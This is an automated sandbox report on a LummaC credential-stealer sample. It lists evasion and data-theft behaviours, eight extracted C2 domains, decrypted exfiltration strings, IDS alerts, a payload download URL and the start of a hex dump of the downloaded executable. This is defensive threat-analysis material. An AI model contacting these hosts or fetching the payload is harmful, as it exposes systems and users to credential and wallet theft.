Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1550148
MD5:7194b1bd9a6fa2bb6f223519917b3fb4
SHA1:e3c4cbbd826eae4168f0a162f39a9f968baadf55
SHA256:90ca2b88263f2bc22cd2803e5dc117eb0c9fea596c87a5f201ba89b98a8d9b11
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7194B1BD9A6FA2BB6F223519917B3FB4)
    • chrome.exe (PID: 5908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,14035377604551262520,15741905147820975122,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,5164532160566674364,7948949956140037157,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacedmny.store", "founpiuer.store", "scriptyprefej.store", "thumbystriw.store", "presticitpo.store", "crisiwarny.store", "fadehairucw.store", "navygenerayk.store"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2109025654.00000000057B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2047895293.00000000057B6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 5508JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:39:15.516815+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549711TCP
            2024-11-06T14:39:44.268743+010020229301A Network Trojan was detected4.175.87.197443192.168.2.561970TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:58.064816+010020283713Unknown Traffic192.168.2.549704104.21.5.155443TCP
            2024-11-06T14:38:59.289556+010020283713Unknown Traffic192.168.2.549705104.21.5.155443TCP
            2024-11-06T14:39:00.911892+010020283713Unknown Traffic192.168.2.549706104.21.5.155443TCP
            2024-11-06T14:39:02.291289+010020283713Unknown Traffic192.168.2.549707104.21.5.155443TCP
            2024-11-06T14:39:03.773731+010020283713Unknown Traffic192.168.2.549708104.21.5.155443TCP
            2024-11-06T14:39:06.941112+010020283713Unknown Traffic192.168.2.549709104.21.5.155443TCP
            2024-11-06T14:39:09.747027+010020283713Unknown Traffic192.168.2.549710104.21.5.155443TCP
            2024-11-06T14:39:15.001514+010020283713Unknown Traffic192.168.2.549714104.21.5.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:58.276149+010020546531A Network Trojan was detected192.168.2.549704104.21.5.155443TCP
            2024-11-06T14:39:00.047531+010020546531A Network Trojan was detected192.168.2.549705104.21.5.155443TCP
            2024-11-06T14:39:16.414929+010020546531A Network Trojan was detected192.168.2.549714104.21.5.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:58.276149+010020498361A Network Trojan was detected192.168.2.549704104.21.5.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:39:00.047531+010020498121A Network Trojan was detected192.168.2.549705104.21.5.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:58.064816+010020571221Domain Observed Used for C2 Detected192.168.2.549704104.21.5.155443TCP
            2024-11-06T14:38:59.289556+010020571221Domain Observed Used for C2 Detected192.168.2.549705104.21.5.155443TCP
            2024-11-06T14:39:00.911892+010020571221Domain Observed Used for C2 Detected192.168.2.549706104.21.5.155443TCP
            2024-11-06T14:39:02.291289+010020571221Domain Observed Used for C2 Detected192.168.2.549707104.21.5.155443TCP
            2024-11-06T14:39:03.773731+010020571221Domain Observed Used for C2 Detected192.168.2.549708104.21.5.155443TCP
            2024-11-06T14:39:06.941112+010020571221Domain Observed Used for C2 Detected192.168.2.549709104.21.5.155443TCP
            2024-11-06T14:39:09.747027+010020571221Domain Observed Used for C2 Detected192.168.2.549710104.21.5.155443TCP
            2024-11-06T14:39:15.001514+010020571221Domain Observed Used for C2 Detected192.168.2.549714104.21.5.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:39:18.186163+010020197142Potentially Bad Traffic192.168.2.549719185.215.113.1680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:57.287256+010020571291Domain Observed Used for C2 Detected192.168.2.5509381.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:57.317415+010020571271Domain Observed Used for C2 Detected192.168.2.5508221.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:57.396802+010020571211Domain Observed Used for C2 Detected192.168.2.5639501.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:57.370198+010020571231Domain Observed Used for C2 Detected192.168.2.5540061.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:57.257803+010020571311Domain Observed Used for C2 Detected192.168.2.5530201.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:38:57.343995+010020571251Domain Observed Used for C2 Detected192.168.2.5610811.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T14:39:08.243357+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.5.155443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeAvira: detected
            Source: https://founpiuer.store/apiWAvira URL Cloud: Label: malware
            Source: https://founpiuer.store/apiderAvira URL Cloud: Label: malware
            Source: http://185.215.113.16/off/def.exe.exeAvira URL Cloud: Label: phishing
            Source: 0.2.file.exe.cfe1a1.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "founpiuer.store", "scriptyprefej.store", "thumbystriw.store", "presticitpo.store", "crisiwarny.store", "fadehairucw.store", "navygenerayk.store"], "Build id": "4SD0y4--legendaryy"}
            Source: file.exeReversingLabs: Detection: 39%
            Source: file.exeJoe Sandbox ML: detected
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.2384058698.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:61989 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:61970 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62095 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62115 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62114 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62116 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62117 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62118 version: TLS 1.2
            Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.2395181974.0000000005D52000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2264920965.0000000008140000.00000004.00001000.00020000.00000000.sdmp

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:50938 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:54006 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:61081 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:53020 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:63950 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:50822 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49706 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49705 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49714 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49710 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49709 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49707 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49708 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2057122 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI) : 192.168.2.5:49704 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49714 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.5.155:443
            Source: Malware configuration extractorURLs: necklacedmny.store
            Source: Malware configuration extractorURLs: founpiuer.store
            Source: Malware configuration extractorURLs: scriptyprefej.store
            Source: Malware configuration extractorURLs: thumbystriw.store
            Source: Malware configuration extractorURLs: presticitpo.store
            Source: Malware configuration extractorURLs: crisiwarny.store
            Source: Malware configuration extractorURLs: fadehairucw.store
            Source: Malware configuration extractorURLs: navygenerayk.store
            Source: global trafficTCP traffic: 192.168.2.5:61963 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 06 Nov 2024 13:39:18 GMTContent-Type: application/octet-streamContent-Length: 2787328Last-Modified: Wed, 06 Nov 2024 12:54:05 GMTConnection: keep-aliveETag: "672b66ed-2a8800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 de d4 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 6b 69 6d 73 78 6f 65 00 40 2a 00 00 a0 00 00 00 28 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6b 65 6f 73 63 7a 73 00 20 00 00 00 e0 2a 00 00 04 00 00 00 62 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 66 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox ViewIP Address: 104.21.5.155 104.21.5.155
            Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
            Source: Joe Sandbox ViewIP Address: 13.107.253.45 13.107.253.45
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.5.155:443
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49719 -> 185.215.113.16:80
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49711
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:61970
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:61989 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
